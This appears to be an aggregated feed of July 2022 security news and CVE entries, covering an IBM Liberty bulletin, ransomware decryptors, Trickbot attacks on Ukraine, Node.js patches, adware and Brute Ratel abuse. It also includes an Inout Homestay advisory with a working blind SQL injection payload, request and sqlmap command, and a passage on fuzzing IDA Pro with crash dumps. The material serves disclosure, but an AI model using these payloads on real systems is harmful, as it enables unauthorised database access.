IBM WebSphere Application Server Liberty 17.0.0.3 through 22.0.0.7 and Open Liberty are vulnerable to identity spoofing by an authenticated user using a specially crafted request. IBM X-Force ID: 225604.

  

**Summary**

IBM WebSphere Application Server Liberty is vulnerable to identity spoofing with the appSecurity-1.0, appSecurity-2.0, appSecurity-3.0 or appSecurity-4.0 feature enabled. This has been addressed.

**Vulnerability Details**

**CVEID:**   CVE-2022-22476  
**DESCRIPTION:**   IBM WebSphere Application Server Liberty and Open Liberty are vulnerable to identity spoofing by an authenticated user using a specially crafted request.  
CVSS Base score: 5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/225604 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L)

**Affected Products and Versions**

Affected Product(s)

Version(s)

IBM WebSphere Application Server Liberty

17.0.0.3 - 22.0.0.7

**Remediation/Fixes**

 IBM strongly recommends addressing the vulnerability now by applying a currently available interim fix or fix pack that contains the APAR PH46073. To determine if a feature is enabled for IBM WebSphere Application Server Liberty, refer to How to determine if Liberty is using a specific feature. 

**For IBM WebSphere Application Server Liberty 17.0.0.3 - 22.0.0.7 using the appSecurity-1.0, appSecurity-2.0, appSecurity-3.0 or appSecurity-4.0 feature(s):**   
· Upgrade to minimal fix pack levels as required by interim fix and then apply Interim Fix PH46073  
\--OR--  
· Apply Liberty Fix Pack 22.0.0.8 or later (targeted availability 3Q2022).

Additional interim fixes may be available and linked off the interim fix download page.

**Workarounds and Mitigations**

None

**References**

Off

**Acknowledgement**

The vulnerability was reported to IBM by Tom Tervoort from Secura.

**Change History**

07 July 2022: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSEQTP","label":"WebSphere Application Server"},"Component":"Liberty","Platform":\[{"code":"PF002","label":"AIX"},{"code":"PF012","label":"IBM i"},{"code":"PF016","label":"Linux"},{"code":"PF033","label":"Windows"},{"code":"PF035","label":"z\\/OS"},{"code":"PF017","label":"Mac OS"}\],"Version":"Liberty","Edition":"Liberty","Line of Business":{"code":"LOB45","label":"Automation"}}\]

CVE-2022-22476: Security Bulletin: IBM WebSphere Application Server Liberty is vulnerable to Identity Spoofing (CVE-2022-22476)

Threat actor released decryption keys after abandoning malware to focus on cryptojacking

Adam Bannister 08 July 2022 at 15:40 UTC

Threat actor released decryption keys after abandoning malware to focus on cryptojacking

Malware protection specialist Emsisoft has released free decryption tools for the AstraLocker and Yashma ransomware variants.

The decryptors were recently uploaded to the VirusTotal malware analysis platform by the ransomware’s developer after they reportedly shut down their operation in order to pivot to cryptojacking.

The AstraLocker decryptor and Yashma decryptor join a host of other decryptors made available for free by Emsisoft, a New Zealand-based outfit.

**Using the decryptor**

“Be sure to quarantine the malware from your system first, or it may repeatedly lock

your system or encrypt files,” reads a guide (PDF) on how to use the AstraLocker tool.

For systems compromised via Windows Remote Desktop, users are advised to change passwords for all users permitted to login remotely and check local user accounts for additional accounts the attacker might have added.

Catch up with the latest ransomware news and attacks

By default, the AstraLocker decryptor pre-populates locations selected for decryption from network and connected drives, but users can add other locations before initiating the decryption process.

The decryptor also defaults to leaving encrypted files in place, although users can enable automatic deletion if disk space is an issue.

“Since the ransomware does not save any information about the unencrypted files, the decryptor can’t guarantee that the decrypted data is identical to the one that was previously encrypted,” the guide warns.

**BabyK offspring**

AstraLocker, which emerged in 2021, is seemingly built on Babuk (or BabyK), a variant deployed via a ransomware-as-a-service (RaaS) model, according to a ReversingLabs analysis of the latter’s leaked source code.

Files are encrypted using a modified HC-128 encryption algorithm and Curve25519 cryptographic function, and or extensions are appended to encrypted files.

Yashma – or ‘AstraLocker 2.0’ – harnesses AES-128 and RSA-2048 to encrypt files and appends encrypted files with the extension or a random four-character alphanumeric combination.

According to ReversingLabs, AstraLocker 2.0 is smuggled into networks via malicious Microsoft Office files.

This ‘smash and grab’ attack methodology is suggestive of a low-skill threat actor, argued Joseph Edwards, senior malware researcher at ReversingLabs.

“This underscores the risk posed to organizations following code leaks like that affecting Babuk, as a large population of low-skill, high-motivation actors leverage the leaked code for use in their own attacks.”

RELATED Ransomware market evolution results in fewer variants, but rise in off-the-shelf cybercrime kits continues

AstraLocker ransomware decryptors released by Emsisoft

Latest campaigns are a break from its usual financially motivated attacks and appear aligned with Russian interests, security researchers say.

In a break from precedent, Russia's hitherto purely financially motivated Trickbot threat group has systematically been attacking targets in Ukraine over the past three months, apparently in support of Russian government interests in the region.

Researchers from IBM's X-Force threat intelligence group this week said they had uncovered two campaigns — and analyzed four others that Ukraine’s Computer Emergency Response Team (CERT-UA) disclosed — where Trickbot went after targets in Ukraine. The campaigns began after Russia’s invasion of Ukraine in February and have targeted Ukrainian state authorities, government organizations, specific individuals, and the general population. Several of the attacks have involved phishing emails with various themes designed to grab the attention of Ukrainian users — included some that are war-related.

The attacks highlight an unprecedented shift for Trickbot, and it's notable because threat groups in former Soviet Union states have typically avoided attacking targets in each other’s countries, IBM said.

Prior to the Russian invasion, ITG23, which is the name by which IBM tracks Trickbot, had not been known to target Ukraine. "Much of the group's malware was even configured to not execute on systems if the Ukrainian language was detected," IBM said in a report summarizing its findings this week. "ITG23's campaigns against Ukraine are notable due to the extent to which this activity differs from historical precedent and the fact that these campaigns appeared specifically aimed at Ukraine with some payloads that suggest a higher degree of target selection."

**Multiple Malware Tools**

IBM said it has observed Trickbot distributing several known malware tools such as IcedID, Cobalt Strike, AnchorMail, and Meterpreter in its attacks on Ukrainian targets. Some of the attacks involved the use of new tools such as a malicious Excel downloader, a self-extracting archive for dropping various malware payloads and a new malware encryption and obfuscation tool.

One of the two Trickbot campaigns that IBM uncovered was in early May. In those attacks, IBM observed the threat actor using a weaponized Excel file to download its AnchorMail backdoor on compromised systems. AnchorMail is a revamped version of Trickbot’s AnchorDNS, a backdoor that members of the closely affiliated Conti group have been using to deploy Conti ransomware. IBM X-Force researchers have previously described the malware as notable for communicating with its command-and-control (C2) server using the DNS protocol.

The second recent Trickbot campaign that IBM X-Force researchers spotted occurred likely in late May or early June. In that campaign, Trickbot actors used an ISO image file — or archive file containing the contents of an optical disk — as part of an attack chain to drop the Cobalt Strike post-exploit attack kit on target system. In June, Trickbot users were observed exploiting the so-called “Follina” zero-day bug in the Windows Microsoft Support Diagnostic Tool (MSDT) to deploy Cobalt Strike.

The campaigns that CERT-UA disclosed, and which IBM X-Force researchers analyzed, involved Trickbot attempts to deploy IcedID, a banking Trojan turned malware distributor; Metasploit attack payload, Meterpreter; and Cobalt Strike. In five of the six observed campaigns, Trickbot actors directly downloaded Cobalt Strike, AnchorMail, or Meterpreter on target systems — another break from their usual habit of deploying these tools as secondary payloads. IBM said the switch suggests "these attacks are part of targeted campaigns during which ITG23 is willing to immediately deploy higher-value backdoors."

IBM described the new malicious Excel downloader that Trickbot is using in the Ukrainian attacks as designed to download malware from a hard-coded URL. The downloader is stored as a macro within the Excel file and runs automatically if the file is opened — provided the user has macros enabled. The new dropper for AnchorMail that IBM observed is in the form of a WinRAR Self Extracting Archive. The dropper is rigged to extract and execute a script for building and configuring AnchorMail on infected systems.

Trickbot is a highly successful threat group that has been around since at least 2016. The group initially used its eponymously named malware to steal credentials to banking accounts. Over the years, the group evolved into a sort of initial access broker and a distributor for several ransomware and malware tools, most notably Conti and Ryuk and Emotet. Trickbot is used variously for stealing data, enabling cryptomining, enumerating systems, and other malicious activities.

Court documents in connection with the arrest of a key member of the group last year showed that nearly 20 cybercriminals — including several malware experts — collaborated in building the malware. A massive 2020 international law enforcement operation to take the threat actor down temporarily disrupted its activities but failed to stop them.

In Switch, Trickbot Group Now Attacking Ukrainian Targets

All security issues have been patched – update now

All security issues have been patched – update now

  

Node.js maintainers have released multiple fixes for vulnerabilities in the JavaScript runtime environment that could lead to arbitrary code execution and HTTP request smuggling, among other attacks.

In an advisory released last night (July 7), the details of seven now-patched bugs were released, including three separate HTTP Request Smuggling vulnerabilities.

Read more of the latest news about security vulnerabilities

These three vulnerabilities – a flawed parsing of transfer-encoding bug, tracked as CVE-2022-32213; an improper delimiting of header fields issue, tracked as CVE-2022-32214; and an Incorrect parsing of multi-line transfer-encoding bug, tracked as CVE-2022-32215 – could all lead to HTTP request smuggling.

These bugs, which were all rated as medium severity, impact all versions of the 18.x, 16.x, and 14.x releases lines. llhttp v6.0.7 and llhttp v2.1.5 contains the fixes that were updated inside Node.js.

**Other issues**

The advisory also contains details of a DNS rebinding vulnerability in via invalid IP addresses.

Rated as high severity, the bug (CVE-2022-32212) could allow for arbitrary code execution, the advisory warns.

“The check can easily be bypassed because does not properly check if an IP address is invalid or not.

“When an invalid IPv4 address is provided browsers will make DNS requests to the DNS server, providing a vector for an attacker-controlled DNS server or a MitM who can spoof DNS responses to perform a rebinding attack and hence connect to the WebSocket debugger, allowing for arbitrary code execution. This is a bypass of CVE-2021-22884,” the post reads. The vulnerability impacts all versions of the 18.x, 16.x, and 14.x releases lines.

The advisory also details a DLL Hijacking vulnerability on Windows (CVE-2022-32223), and CVE-2022-32222, a medium-severity bug that could allow an attacker to attempt to read openssl.cnf from upon system startup.

BACKGROUND High severity OpenSSL bug could lead to remote code execution

Finally, the release also contains fixes for a vulnerability in OpenSSL, as previously reported by The Daily Swig.

The moderate-severity implementation bug (CVE-2022-2097) could cause encryption to fail in some circumstances.

AES OCB mode for 32-bit x86 platforms using the AES-NI assembly optimised implementation will not encrypt the entirety of the data, which could reveal sixteen bytes of data that was pre-existing in the memory that wasn’t written.

In the special case of ‘in place’ encryption, sixteen bytes of the plaintext could be revealed.

Since OpenSSL does not support OCB based cipher suites for TLS and DTLS, they are both unaffected.

All of the vulnerabilities have been fixed in the latest versions, Node.js v14.20.0 (LTS), Node.js v16.16.0 (LTS), and Node.js v18.5.0 (Current).

YOU MAY ALSO LIKE Spring Data MongoDB hit by another critical SpEL injection flaw

Node.js fixes multiple bugs that could lead to RCE, HTTP request smuggling

A malicious browser extension with 350 variants is masquerading as a Google Translate add-on as part of an adware campaign targeting Russian users of Google Chrome, Opera, and Mozilla Firefox browsers.
Mobile security firm Zimperium dubbed the malware family ABCsoup, stating the "extensions are installed onto a victim's machine via a Windows-based executable, bypassing most endpoint security

A malicious browser extension with 350 variants is masquerading as a Google Translate add-on as part of an adware campaign targeting Russian users of Google Chrome, Opera, and Mozilla Firefox browsers.

Mobile security firm Zimperium dubbed the malware family **ABCsoup**, stating the "extensions are installed onto a victim's machine via a Windows-based executable, bypassing most endpoint security solutions, along with the security controls found in the official extension stores."

The rogue browser add-ons come with the same extension ID as that of Google Translate — "aapbdbdomjkkjkaonfhkkikfgjllcleb" — in an attempt to trick users into believing that they have installed a legitimate extension.

The extensions are not available on the official browser web stores themselves. Rather they are delivered through different Windows executables that install the add-on on the victim's web browser.

In the event the targeted user already has the Google Translate extension installed, it replaces the original version with the malicious variant owing to their higher version numbers (30.2.5 vs. 2.0.10).

"Furthermore, when this extension is installed, Chrome Web Store assumes that it is Google Translate and not the malicious extension since the Web Store only checks for extension IDs," Zimperium researcher Nipun Gupta said.

All the observed variants of the extension are geared towards serving pop-ups, harvesting personal information to deliver target-specific ads, fingerprinting searches, and injecting malicious JavaScript that can further act as a spyware to capture keystrokes and monitor web browser activity.

The main function of ABCsoup entails checking for Russian social networking services like Odnoklassniki and VK among the current websites opened in the browser, and if so, gather the users' first and last names, dates of birth, and gender, and transmit the data to a remote server.

Not only does the malware use this information to serve personalized ads, the extension also comes with capabilities to inject custom JavaScript code based on the websites opened. This includes YouTube, Facebook, ASKfm, Mail.ru, Yandex, Rambler, Avito, Brainly's Znanija, Kismia, and rollApp, suggesting a heavy Russia focus.

Zimperium attributed the campaign to a "well-organized group" of Eastern European and Russian origin, with the extensions designed to target Russian users given the wide variety of local domains targeted.

"This malware is purposefully designed to target all kinds of users and serves its purpose of retrieving user information," Gupta said. "The injected scripts can be easily used to serve more malicious behavior into the browser session, such as keystroke mapping and data exfiltration."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Experts Uncover 350 Browser Extension Variants Used in ABCsoup Adware Campaign

The latest criminal use of a legitimate red-teaming tool helps attackers stay under the radar and better access living-off-the-land binaries.

In a fresh campaign that takes a page from the advanced persistent threat known as APT29, hackers are shifting away from the Cobalt Strike post-exploitation toolkit, instead embracing Brute Ratel C4 (BRc4).

BRc4 is the latest upstart in the red-team tooling world; like Cobalt Strike, it's an adversarial attack simulation tool designed for penetration testers. It’s a command-and-control (C2) framework that's not easily detected by endpoint detection and response (EDR) technology or other anti-malware tools.

A report from Palo Alto Networks' Unit 42 research team found evidence of attackers subverting Brute Ratel's free licensing protections and utilizing the tool to run criminal attack campaigns.

The infrastructure they uncovered is extensive, researchers noted.

"In terms of C2, we found that the sample called home to an Amazon Web Services (AWS) IP address located in the United States over port 443," they explained. "Further, the X.509 certificate on the listening port was configured to impersonate Microsoft with an organization name of 'Microsoft' and organization unit of 'Security.'"

Pivoting on the certificate and other artifacts, "we identified a total of 41 malicious IP addresses, nine BRc4 samples, and an additional three organizations across North and South America who have been impacted by this tool so far," they added.

**Living-Off-the-Land Techniques**

Unit 42 said the sample utilizing BRc4 uses known APT29 techniques, including well-known cloud storage and online collaboration applications. In this case, the sample studied was packaged up as a self-contained ISO that included a Windows shortcut LNK file, a malicious payload library, and a legitimate copy of Microsoft OneDrive Updater.

"Attempts to execute the benign application from the ISO-mounted folder resulted in the loading of the malicious payload as a dependency through a technique known as DLL search order hijacking," the report explained.

This technique of using legitimate tools and native utilities is known as "living off the land," and threat actors are increasingly using living-off-the-land binaries (LOLBins) to drop malicious payloads.

Last week for instance, researchers with Cyble reported an uptick in LNK file-based builders growing in popularity on Dark Web marketplaces, as various malware families lean on them for payload delivery.

"We have observed a steadily increasing number of high-profile threat actors shifting back to .LNK files to deliver their payloads," the Cyble researchers wrote. "Typically, threat actors use LOLBins in such infection mechanisms because it makes detecting malicious activity significantly harder."

**Where Red Team Tools Fit In**

Tools like Cobalt Strike and BRc4 aren't purely living-off-the-land approaches, "since you still have to introduce a piece of malware onto the system as opposed to using the operating systems built in tooling," explains Tim McGuffin, director of adversarial engineering at LARES Consulting.

However, these tools are nevertheless popular with attackers for their ability to evade detection mechanisms, fundamentally for the same reason as a living-off-the-land attack works — because they're otherwise viewed as legitimate software.

"Brute Ratel is an otherwise legitimate tool that might be present in victim networks," explains John Bambenek, principal threat hunter at Netenrich. "Since its use is likely whitelisted, it allows for attackers to operate more discretely than they would otherwise be able to do."

This is an unfortunate cycle that the security world has seen occur for a long time, as attackers are drawn to red-team tools like flies to honey.

According to Ivan Righi, senior cyber threat intelligence analyst for Digital Shadows, it's no surprise that BRc4 makes for an attractive tool. Not only does it have offensive security capabilities similar to Cobalt Strike that can be abused for malicious purpose, but it is also less known than Cobalt Strike.

"Many security solutions may not yet detect Brute Ratel as malicious, as opposed to Cobalt Strike, which is generally more well-known for being used for malicious purposes," Righi says.

According to McGuffin, security practitioners should be concerned about all toolkits like these, whether open source, commercial, or custom. But he believes that they shouldn't get caught up in the whack-a-mole game of detecting the framework or the tooling itself. Instead, they should focus on hardening their systems.

"An emphasis on endpoint hardening can be placed on prevention against any C2 tooling. An example is Microsoft's Attack Surface Reduction 'Application Allow-listing' guidance," he says. "The setting prevents unknown binaries from being introduced, and network egress hardening to prevent C2 callbacks to Command-and-Control servers."

Stealthy Cyber-Campaign Ditches Cobalt Strike for Rival 'Brute Ratel' Pen Test Tool

File upload vulnerability in GFI Mail Archiver versions up to and including 15.1 via insecure implementation of Telerik Web UI plugin which is affected by CVE-2014-2217, and CVE-2017-11317.

CVE-2021-29281: Unrestricted File Upload | OWASP Foundation

Inout Homestay v2.2 was discovered to contain a SQL injection vulnerability via the guests parameter at /index.php?page=search/rentals.

**Information**

    Vulnerability Name  : Remote Blind SQL Injections in Inout Homestay
    Product             : Inout Homestay
    version             : 2.2
    Date                : 2022-05-26
    Vendor Site         : https://www.inoutscripts.com/products/inout-homestay/
    POC                 : https://github.com/bigb0x/CVEs/blob/main/Inout-Homestay-2-2-sqli.md
    CVE-Number          : In Progess
    Exploit Author      : Mohamed N. Ali @MohamedNab1l
    

  
**Description**

Inout Homestay Version 2.2 suffers from time-based blind SQL injection. POST parameters "guests" is vulnerable to SQL imjection attacks.This will allow remote non-authenticated attackers to inject SQL code. This could result in full information disclosure.  

**Vulnerable Parameter: guests (POST)**

Vulnerability: time-based blind SQL injection in guests (POST) parameter. Vulnerabile file: index.php  

**Payload**

address\=3137 Laguna Street&guests\=1' AND (SELECT 1769 FROM (SELECT(SLEEP(5)))XPZb) AND
'ADfU'\='ADfU&indate\=01/01/1967&lat\=1&location\=1&long\=1&outdate\=01/01/1967&searchcity\=San Francisco&searchstate\=NY

  
**HTTP Post Request**

POST /index.php?page\=search/rentals HTTP/1.1
Content\-Type: application/x\-www\-form\-urlencoded
X\-Requested\-With: XMLHttpRequest
Referer: http://vlun\-host.com/
Cookie: currencyid\=10; currencycode\=BYR; language\=2; io\_lang\_code\=es
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Encoding: gzip,deflate,br
Content-Length: 189
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36
Host: vlun-host.com
Connection: Keep-alive
address=3&guests=-1 \[inject\_sql\_here\]&indate=01/01/1967&lat=1&location=1&long=1&outdate=01/01/1967&searchcity=San%20Francisco&searchstate=NY

  
**POC: sqlmap command:**

python sqlmap.py \-r homestay.txt  \-p guests \--dbms=MySQL --banner --random-agent --current-db --dbs --current-user

  
**output:**

  
**Timeline**

    2022-05-03: Discovered the bug
    2022-05-03: Reported to vendor
    2022-05-22: Advisory published
    

  
**Discovered by**

    Mohamed N. Ali
    @MohamedNab1l
    ali.mohamed[at]gmail.com

CVE-2022-32055: CVEs/Inout-Homestay-2-2-sqli.md at main · bigb0x/CVEs

A memory corruption in Hex Rays Ida Pro v6.6 allows attackers to cause a Denial of Service (DoS) via a crafted file. Related to Data from Faulting Address controls subsequent Write Address starting at msvcrt!memcpy+0x0000000000000056.

Last time during one of the "Night Fuzzing Sessions" I found few bugs in IdaPro 6.6. I decided to continue this adventure but with a 'new approach'. So I changed my _input files_. ;) Below you will find the details about it. Here we go... 

This time we'll start here:

Just like during the previous part - I used similar environment (and settings for the FOE2 fuzzer) as I did before. Only thing I changed here was:

\- run Kali VM and  

\- prepare 'payload/input file' using _msfvenom_.

If you're not familiar with _msfvenom_ I will always recommend you to read the fantastic manual:

My goal was to prepare a "reverse shell" for various "platforms" (linux/bsd/macos and so on...) and run it in the same way I did before with IdaPro:

 

**TL;DR:**  

After a while we should be somewhere here:

For example:

**Case #01:**

\---<cut>---

(...)  
Microsoft (R) Windows Debugger Version 6.11.0001.404 X86  
Copyright (c) Microsoft Corporation. All rights reserved.

CommandLine: "C:\\Program Files\\IDA 6.6\\idaq.exe" -B -A -a- -c C:\\FOE2\\fuzzdir\\campaign\_ijatnp\\iteration\_m\_yrvq\\foe-crash-l0mnvu\\sf\_0d75862d5d90166274cc61a363c74828-576.exe  
(...)  
Executable search path is:  
ModLoad: 00090000 003a3000   idaq.exe  
(...)  
(12a0.1334): Access violation - code c0000005 (first chance)  
First chance exceptions are reported before any exception handling.  
This exception may be expected and handled.  
eax=00000000 ebx=07de0ba8 ecx=00000007 edx=00000000 esi=02532fe8 edi=005bc114  
eip=77559966 esp=005bbdf4 ebp=005bbdfc iopl=0         nv up ei ng nz ac pe cy  
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010297  
msvcrt!memcpy+0x56:  
77559966 8b448efc        mov     eax,dword ptr \[esi+ecx\*4-4\] ds:0023:02533000=????????

0:000> r;r;!exploitable -v;kb;r;q  
eax=00000000 ebx=07de0ba8 ecx=00000007 edx=00000000 esi=02532fe8 edi=005bc114  
eip=77559966 esp=005bbdf4 ebp=005bbdfc iopl=0         nv up ei ng nz ac pe cy  
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010297  
msvcrt!memcpy+0x56:  
77559966 8b448efc        mov     eax,dword ptr \[esi+ecx\*4-4\] ds:0023:02533000=????????  
eax=00000000 ebx=07de0ba8 ecx=00000007 edx=00000000 esi=02532fe8 edi=005bc114  
eip=77559966 esp=005bbdf4 ebp=005bbdfc iopl=0         nv up ei ng nz ac pe cy  
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010297  
msvcrt!memcpy+0x56:  
77559966 8b448efc        mov     eax,dword ptr \[esi+ecx\*4-4\] ds:0023:02533000=????????

!exploitable 1.6.0.0  
HostMachine\\HostUser  
Executing Processor Architecture is x86  
Debuggee is in User Mode  
Debuggee is a live user mode debugging session on the local machine  
Event Type: Exception  
Exception Faulting Address: 0x2533000  
First Chance Exception Type: STATUS\_ACCESS\_VIOLATION (0xC0000005)  
Exception Sub-Type: Read Access Violation

Faulting Instruction:77559966 mov eax,dword ptr \[esi+ecx\*4-4\]

Basic Block:  
    77559966 mov eax,dword ptr \[esi+ecx\*4-4\]  
       Tainted Input operands: 'ecx','esi'  
    7755996a mov dword ptr \[edi+ecx\*4-4\],eax  
       Tainted Input operands: 'eax','ecx'  
    7755996e lea eax,\[ecx\*4\]  
       Tainted Input operands: 'ecx'  
    77559975 add esi,eax  
       Tainted Input operands: 'eax','esi'  
    77559977 add edi,eax  
       Tainted Input operands: 'eax'  
    77559979 jmp dword ptr msvcrt!memcpy+0xa8 (775599b8)\[edx\*4\]

Exception Hash (Major/Minor): 0x17cc121f.0x62867b4b

 Hash Usage : Stack Trace:  
Major+Minor : msvcrt!memcpy+0x56  
Major+Minor : dbghelp!StackWalk64+0x1bba  
Major+Minor : dbghelp!SymGetModuleInfoW64+0x549  
Major+Minor : dbghelp!FindExecutableImage+0x80e  
Major+Minor : dbghelp!StackWalk64+0x2a85  
Minor       : dbghelp!StackWalk64+0x2cff  
Minor       : dbghelp!SymLoadModuleEx+0x44  
Minor       : dbghelp!SymLoadModule64+0x23  
Minor       : pdb+0x1a8d7  
Minor       : IDA!run\_plugin+0x3a  
Minor       : dbg+0x8277  
Minor       : dbg+0x9f2f  
Minor       : SYSFER+0x45b1b  
Minor       : SYSFER+0x45b1b  
Minor       : SYSFER+0x45a1c  
Minor       : idaq+0x70000  
Minor       : idaq+0x70000  
Minor       : idaq+0x70000  
Minor       : dbg+0xa175  
Instruction Address: 0x0000000077559966

Description: Data from Faulting Address controls subsequent Write Address  
Short Description: TaintedDataControlsWriteAddress  
Exploitability Classification: PROBABLY\_EXPLOITABLE  
Recommended Bug Title: Probably Exploitable - Data from Faulting Address controls subsequent Write Address starting at msvcrt!memcpy+0x0000000000000056 (Hash=0x17cc121f.0x62867b4b)

The data from the faulting address is later used as the target for a later write.  
ChildEBP RetAddr  Args to Child                
WARNING: Stack unwind information not available. Following frames may be wrong.  
005bbdfc 66345b61 005bc114 02532fe8 0000001c msvcrt!memcpy+0x56  
005bbe10 66341059 07de0ba8 00000000 02520000 dbghelp!StackWalk64+0x1bba  
005bc1bc 66368036 07de0ba8 00000002 00000000 dbghelp!SymGetModuleInfoW64+0x549  
005bc1d4 66346a2c 07de0ba8 3be9e1ee 00000000 dbghelp!FindExecutableImage+0x80e  
005bc664 66346ca6 beeffeed 07ddb518 00400000 dbghelp!StackWalk64+0x2a85  
005bcac8 66363a0e beeffeed 07ddb430 00000000 dbghelp!StackWalk64+0x2cff  
005bcb28 66363aa4 beeffeed 00000000 07ddb430 dbghelp!SymLoadModuleEx+0x44  
005bcb54 70cea8d7 beeffeed 00000000 02f74320 dbghelp!SymLoadModule64+0x23  
005bcc28 66ad515a 00000001 00000010 03108d70 pdb+0x1a8d7  
005bceb0 726a8277 03108d70 0000004a 00000001 IDA!run\_plugin+0x3a  
005bcee0 726a9f2f 66bff840 00000000 3bf980a6 dbg+0x8277  
005bcf04 753d5b1b 00000006 753d5b1b 0000077f dbg+0x9f2f  
005bcf0c 753d5b1b 0000077f 031596a0 3fe84430 SYSFER+0x45b1b  
005bcf44 753d5a1c 00000006 3fe844c4 0000000f SYSFER+0x45b1b  
005bcfc0 00100000 00001000 00000000 00000010 SYSFER+0x45a1c  
005bd0b0 00100000 00001000 00100000 00001000 idaq+0x70000  
005bd0b8 00100000 00001000 00000000 00000010 idaq+0x70000  
005bd174 726aa175 66bff840 000000e8 031597c0 idaq+0x70000  
00000000 00000000 00000000 00000000 00000000 dbg+0xa175  
eax=00000000 ebx=07de0ba8 ecx=00000007 edx=00000000 esi=02532fe8 edi=005bc114  
eip=77559966 esp=005bbdf4 ebp=005bbdfc iopl=0         nv up ei ng nz ac pe cy  
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010297  
msvcrt!memcpy+0x56:  
77559966 8b448efc        mov     eax,dword ptr \[esi+ecx\*4-4\] ds:0023:02533000=????????

  

\---<cut>---

Next case below.  

**Case #02:**

\---<cut>---

(...)

Microsoft (R) Windows Debugger Version 6.11.0001.404 X86  
Copyright (c) Microsoft Corporation. All rights reserved.

CommandLine: "C:\\Program Files\\IDA 6.6\\idaq.exe" -B -A -a- -c C:\\FOE2\\fuzzdir\\campaign\_ijatnp\\iteration\_uw\_mli\\foe-crash-reinn3\\sf\_0d75862d5d90166274cc61a363c74828-492.exe  
(...)  
Executable search path is:  
ModLoad: 013c0000 016d3000   idaq.exe  
(...)  
(15a8.12b8): Access violation - code c0000005 (first chance)  
First chance exceptions are reported before any exception handling.  
This exception may be expected and handled.  
eax=06bac1fc ebx=08250ba8 ecx=00000007 edx=00000000 esi=06bac1e0 edi=0025be54  
eip=77559dbd esp=0025bb34 ebp=0025bb3c iopl=0         nv up ei ng nz ac pe cy  
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010297  
msvcrt!malloc+0xcf:  
77559dbd 8b448ee4        mov     eax,dword ptr \[esi+ecx\*4-1Ch\] ds:0023:06bac1e0=????????

0:000> r;r;!exploitable -v;kb;r;q  
eax=06bac1fc ebx=08250ba8 ecx=00000007 edx=00000000 esi=06bac1e0 edi=0025be54  
eip=77559dbd esp=0025bb34 ebp=0025bb3c iopl=0         nv up ei ng nz ac pe cy  
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010297  
msvcrt!malloc+0xcf:  
77559dbd 8b448ee4        mov     eax,dword ptr \[esi+ecx\*4-1Ch\] ds:0023:06bac1e0=????????  
eax=06bac1fc ebx=08250ba8 ecx=00000007 edx=00000000 esi=06bac1e0 edi=0025be54  
eip=77559dbd esp=0025bb34 ebp=0025bb3c iopl=0         nv up ei ng nz ac pe cy  
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010297  
msvcrt!malloc+0xcf:  
77559dbd 8b448ee4        mov     eax,dword ptr \[esi+ecx\*4-1Ch\] ds:0023:06bac1e0=????????

!exploitable 1.6.0.0  
HostMachine\\HostUser  
Executing Processor Architecture is x86  
Debuggee is in User Mode  
Debuggee is a live user mode debugging session on the local machine  
Event Type: Exception  
Exception Faulting Address: 0x6bac1e0  
First Chance Exception Type: STATUS\_ACCESS\_VIOLATION (0xC0000005)  
Exception Sub-Type: Read Access Violation

Faulting Instruction:77559dbd mov eax,dword ptr \[esi+ecx\*4-1ch\]

Basic Block:  
    77559dbd mov eax,dword ptr \[esi+ecx\*4-1ch\]  
       Tainted Input operands: 'ecx','esi'  
    77559dc1 mov dword ptr \[edi+ecx\*4-1ch\],eax  
       Tainted Input operands: 'eax','ecx'  
    77559dc5 jmp msvcrt!memset+0x8a (7755981a)

Exception Hash (Major/Minor): 0xa95bda97.0x1ca78871

 Hash Usage : Stack Trace:  
Excluded    : msvcrt!malloc+0xcf  
Major+Minor : dbghelp!StackWalk64+0x1bba  
Major+Minor : dbghelp!SymGetModuleInfoW64+0x549  
Major+Minor : dbghelp!FindExecutableImage+0x80e  
Major+Minor : dbghelp!StackWalk64+0x2a85  
Major+Minor : dbghelp!StackWalk64+0x2cff  
Minor       : dbghelp!SymLoadModuleEx+0x44  
Minor       : dbghelp!SymLoadModule64+0x23  
Minor       : pdb+0x1a8d7  
Minor       : IDA!run\_plugin+0x3a  
Minor       : dbg+0x8277  
Minor       : dbg+0x9f2f  
